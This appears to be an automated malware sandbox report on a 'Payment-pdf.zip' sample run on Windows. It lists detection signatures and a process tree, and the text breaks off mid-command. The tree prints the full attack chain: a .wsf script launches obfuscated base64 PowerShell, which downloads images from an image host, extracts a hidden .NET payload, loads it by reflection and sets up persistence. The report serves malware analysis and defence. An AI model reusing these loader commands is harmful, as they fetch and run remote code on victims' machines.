Analysis

  • max time kernel
    210s
  • max time network
    209s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-04-2024 21:59

General

  • Target

    https://sinatrafoods.com/Payment-pdf.zip

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 54 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 39 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://sinatrafoods.com/Payment-pdf.zip
    1⤵
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabd6946f8,0x7ffabd694708,0x7ffabd694718
      2⤵
        PID:4688
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        2⤵
          PID:4480
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4692
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
          2⤵
            PID:1496
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
            2⤵
              PID:4780
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
              2⤵
                PID:3880
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                2⤵
                  PID:4000
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1680
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                  2⤵
                    PID:2528
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
                    2⤵
                      PID:4640
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3496 /prefetch:8
                      2⤵
                        PID:4868
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                        2⤵
                          PID:2416
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2260
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
                          2⤵
                            PID:512
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
                            2⤵
                              PID:1900
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,18344695836754084485,4556067720074113401,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6100
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:1028
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4648
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:1880
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "E:\Payment-pdf.wsf"
                                  1⤵
                                  • Blocklisted process makes network request
                                  • Checks computer location settings
                                  • Enumerates connected drives
                                  PID:2312
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreHIDgTreYQBtDgTreC8DgTreZQBkDgTreC8DgTreZDgTreBpDgTreC4DgTrecwBuDgTreHoDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBXDgTreGkDgTrebgBkDgTreG8DgTredwBzDgTreFwDgTreVDgTreBlDgTreG0DgTrecDgTreBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreFcDgTrecwBmDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3924
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ram/ed/di.snz//:sptth' , '1' , 'C:\Windows\Temp\' , 'NameWsf','RegAsm',''))} }"
                                      3⤵
                                      • Blocklisted process makes network request
                                      • Adds Run key to start application
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:372
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\NameWsf.vbs
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4332
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "E:\Payment-pdf.wsf"
                                  1⤵
                                  • Checks computer location settings
                                  • Enumerates connected drives
                                  PID:4128
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreC